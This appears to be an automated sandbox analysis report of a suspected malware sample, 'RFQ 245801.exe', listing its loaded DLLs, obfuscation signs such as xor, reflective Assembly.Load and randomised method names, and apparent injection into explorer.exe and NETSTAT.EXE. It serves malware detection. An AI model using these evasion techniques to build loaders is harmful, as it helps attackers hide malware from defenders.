Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: snmpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\RFQ 245801.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ 245801.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ 245801.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

Source: RFQ 245801.exe, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.5370000.3.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.2b5f4a8.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs .Net Code: IoaH7M1VvS System.Reflection.Assembly.Load(byte[])
Source: 6.2.explorer.exe.1120f840.0.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 7.2.NETSTAT.EXE.35ef840.3.raw.unpack, frmTimer.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0E75 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029E0D50 pushfd ; iretd 0_2_029E0E79
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416825 push ecx; iretd 5_2_00416829
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_004168EA push ecx; ret 5_2_004168F6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417116 push ss; iretd 5_2_00417118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00417132 push ecx; iretd 5_2_00417133
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041E9B2 push edx; iretd 5_2_0041E9B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041EA0C push 6B25699Fh; iretd 5_2_0041EA11
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00416B3D push ds; retf 5_2_00416B4E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0040A47D pushad ; ret 5_2_0040A47E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D4DB push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D53C push eax; ret 5_2_0041D542
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F225F pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F27FA pushad ; ret 5_2_016F27F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx 5_2_017209B6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_016F283D push eax; iretd 5_2_016F2858
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB02 push esp; retn 0000h 6_2_0F6FAB03
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FAB1E push esp; retn 0000h 6_2_0F6FAB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0F6FA9B5 push esp; retn 0000h 6_2_0F6FAAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBAB9B5 push esp; retn 0000h 6_2_0FBABAE7
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB1E push esp; retn 0000h 6_2_0FBABB1F
Source: C:\Windows\explorer.exe Code function: 6_2_0FBABB02 push esp; retn 0000h 6_2_0FBABB03
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_006460DD push ecx; ret 7_2_006460F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_030D09AD push ecx; mov dword ptr [esp], ecx 7_2_030D09B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7132 push ecx; iretd 7_2_026B7133
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026B7116 push ss; iretd 7_2_026B7118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026AA47D pushad ; ret 7_2_026AA47E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BD4DB push eax; ret 7_2_026BD542
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BD4D2 push eax; ret 7_2_026BD4D8
          Source: RFQ 245801.exeStatic PE information: section name: .text entropy: 7.932697234212169
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
